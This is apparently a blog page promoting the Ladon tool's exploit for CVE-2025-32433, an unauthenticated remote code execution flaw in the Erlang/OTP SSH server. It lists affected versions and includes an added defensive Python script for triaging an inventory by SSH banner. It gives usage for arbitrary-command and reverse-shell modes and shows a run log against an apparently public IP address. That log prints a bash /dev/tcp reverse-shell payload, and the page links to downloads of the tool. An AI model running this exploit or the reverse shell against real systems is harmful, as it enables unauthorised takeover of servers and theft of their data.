
K8哥哥

No system is absolutely secure

Ladon CVE-2025-32433 Erlang/OTP SSH EXP

CVE-2025-32433 Erlang/OTP SSH RCE EXP

Description

A serious vulnerability has been identified in the Erlang/OTP SSH server that may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This could lead to compromise of said hosts, allowing for unauthorized access to and manipulation of sensitive data by third parties, or denial-of-service attacks.

Affected Versions

OTP-27.3.2 and earlier
OTP-26.2.5.10 and earlier
OTP-25.3.2.19 and earlier
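
For defenders triaging an asset inventory against the list above, the following is an added example and not part of the original post or the Ladon project. It assumes you already have each host's SSH banner and, where known, its installed OTP release; the host names and sample records are constructed.

```python
import re

# Last affected release per branch, copied from the "Affected Versions" list.
LAST_AFFECTED = {27: (27, 3, 2), 26: (26, 2, 5, 10), 25: (25, 3, 2, 19)}
# The Erlang SSH daemon announces itself as in the Result output on this page.
# The number in the banner is the ssh application version, not the OTP
# release, so the OTP version has to come from package or release inventory.
ERLANG_BANNER = re.compile(r"^SSH-2\.0-Erlang/\d+(?:\.\d+)*\s*$")

def parse_otp_version(text):
    """'OTP-26.2.5.10' or '26.2.5.10' -> (26, 2, 5, 10)."""
    m = re.fullmatch(r"(?:OTP-)?(\d+(?:\.\d+)*)", text.strip())
    if not m:
        raise ValueError(f"not an OTP version: {text!r}")
    return tuple(int(p) for p in m.group(1).split("."))

def is_affected(version):
    """True/False for branches 25-27, None for branches the list does not cover."""
    v = parse_otp_version(version)
    limit = LAST_AFFECTED.get(v[0])
    if limit is None:
        return None
    width = max(len(v), len(limit))
    pad = lambda t: t + (0,) * (width - len(t))  # treat 26.2.5 as 26.2.5.0
    return pad(v) <= pad(limit)

def triage(record):
    """record: dict with 'banner' and optional 'otp' (hypothetical field names)."""
    if not ERLANG_BANNER.match(record["banner"]):
        return "not Erlang SSH"
    if not record.get("otp"):
        return "review: Erlang SSH exposed, OTP version unknown"
    verdict = is_affected(record["otp"])
    if verdict is None:
        return "review: branch not in the affected list"
    return "affected" if verdict else "not in affected range"

# Constructed inventory: host names, banners and versions are sample values.
SAMPLE = {
    "build-01": {"banner": "SSH-2.0-Erlang/5.2.9", "otp": "OTP-27.3.2"},
    "mq-02": {"banner": "SSH-2.0-Erlang/5.1.4.8", "otp": "26.2.5.11"},
    "edge-03": {"banner": "SSH-2.0-Erlang/4.7.6.3", "otp": None},
    "legacy-04": {"banner": "SSH-2.0-Erlang/4.13.2", "otp": "OTP-24.3.4"},
    "jump-05": {"banner": "SSH-2.0-OpenSSH_9.6", "otp": None},
}

if __name__ == "__main__":
    for host, rec in SAMPLE.items():
        print(f"{host:10} {triage(rec)}")
```

Hosts that come back as "review" need their OTP release confirmed by hand, since the list above gives no bound for those branches and the banner alone does not identify the release.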

Features

  • Exploit Execution: Execute arbitrary commands.
  • Reverse Shell: Initiate a bash-based reverse shell.

Usage

Usage:
Ladon CVE-2025-32433 <target_ip> <target_port> [mode] [options]

Modes:

  1. Command Execution Mode:
    Ladon CVE-2025-32433 <target_ip> <target_port> cmd “

    Example:

    Ladon CVE-2025-32433 192.168.18.9 2222 cmd "id>888.txt"
  2. Reverse Shell Mode:
    Ladon CVE-2025-32433 <target_ip> <target_port> shell <local_ip> <local_port>

    Example:

    Ladon CVE-2025-32433 192.168.18.9 2222 shell 192.168.18.203 4444

Result

C:\Users\Administrator\Desktop\Ladon12>Ladon CVE-2025-32433 185.164.148.243 7777 shell 192.168.1.1 4444

Load CVE-2025-32433
[*] Sending reverse shell to connect back to 192.168.1.1:4444
[*] Connecting to target...
[+] Received banner: SSH-2.0-Erlang/4.7.6.3
[+] Running command: os:cmd("bash -c 'exec 5<>/dev/tcp/192.168.1.1/4444; cat <&5 | while read line; do $line 2>&5 >&5; done'").
[√] Exploit sent. If vulnerable, command should execute.
[+] Reverse shell command sent. Check your listener.

CVE-2025-32433

Download

LadonGo (ALL OS)

https://github.com/k8gege/LadonGo/releases

Ladon (Windows & Cobalt Strike)

Historical versions: https://github.com/k8gege/Ladon/releases
911 version: http://k8gege.org/Download

References

GitHub Advisory

NVD CVE-2025-32433

Platform Security

Reprint Notice

K8 blog articles may be freely reposted; please credit the source! © K8gege http://k8gege.org
